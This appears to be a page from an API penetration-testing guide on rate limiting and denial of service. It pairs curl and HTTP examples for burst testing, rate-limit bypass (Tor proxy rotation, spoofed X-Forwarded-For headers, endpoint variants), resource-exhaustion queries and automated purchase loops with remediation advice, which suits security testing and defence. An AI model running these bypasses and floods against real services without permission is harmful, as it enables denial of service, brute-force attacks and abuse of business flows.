API Security API4 API6

Rate Limiting & DoS

APIs that lack proper rate limiting are vulnerable to Denial of Service (DoS), brute force attacks, and resource exhaustion. Attackers can also abuse business logic flows (like purchasing or voting) if they are not rate-limited.

Rate Limiting Detection

First, determine if rate limiting is in place and what the limits are.

Basic Testing

Send a burst of requests and check the response codes.

bash 
for i in {1..100}; do
  curl -s -o /dev/null -w "%{http_code}\n" \
    -H "Authorization: Bearer $TOKEN" \
    https://api.target.com/api/users
done | sort | uniq -c

Response Headers

Check for headers that indicate rate limits.

bash 
curl -v https://api.target.com/api/users 2>&1 | grep -i rate

# Common headers:
# X-RateLimit-Limit: 100
# X-RateLimit-Remaining: 99
# X-RateLimit-Reset: 1640000000
# Retry-After: 60

Rate Limit Bypass

If rate limiting is detected, try to bypass it using various techniques.

1. IP Rotation

If limits are IP-based, rotate your IP address.

bash 
curl --proxy socks5://127.0.0.1:9050 https://api.target.com/api/users

2. Header Manipulation

Spoof your IP address using headers like X-Forwarded-For.

bash 
curl -H "X-Forwarded-For: 127.0.0.1" https://api.target.com/api/users
curl -H "X-Real-IP: 10.0.0.1" https://api.target.com/api/users
curl -H "X-Originating-IP: 192.168.1.1" https://api.target.com/api/users
curl -H "X-Client-IP: 172.16.0.1" https://api.target.com/api/users

3. Endpoint Variation

Try different versions or case variations of the endpoint.

  • /api/v1/users
  • /api/v2/users
  • /api/users
  • /v1/api/users
  • /api/Users
  • /API/USERS
  • /Api/Users
  • /api/users/
  • /api/users%20
  • /api/users%00

Resource Consumption

Test for endpoints that consume excessive resources.

Large Response Testing

Request large amounts of data via pagination or limit parameters.

http 
GET /api/users?limit=10000
GET /api/users?page=1&per_page=999999
GET /api/search?q=a&results=all

Deep Pagination

Requesting very high page numbers can stress the database.

http 
GET /api/items?page=1000000

Field Expansion

Requesting all fields or nested relations can be expensive.

http 
GET /api/users?fields=*
GET /api/users?include=all,nested,relations

Batch Requests

Send a large number of operations in a single batch request.

http 
POST /api/batch
Content-Type: application/json

{"ids": [1,2,3,...thousands of IDs...]}

Business Flow Abuse

Automate business actions like purchasing or account creation.

bash 
for i in {1..100}; do
  curl -X POST https://api.target.com/api/purchase -d '{"item_id": 1}'
done

Remediation

Defense Strategies

  • Implement rate limiting (e.g., Token Bucket algorithm) on all API endpoints.
  • Limit payload sizes (e.g., max JSON body size, max file upload size).
  • Implement pagination limits (e.g., max 100 items per page).
  • Set timeouts for all API operations.
  • Use a Web Application Firewall (WAF) to detect and block DoS attacks.

Related Topics

← Back to API Pentesting

Overview of API security testing

Mass Assignment

Object property injection

API Injection

Injection attacks on APIs

Authentication Testing

Brute force prevention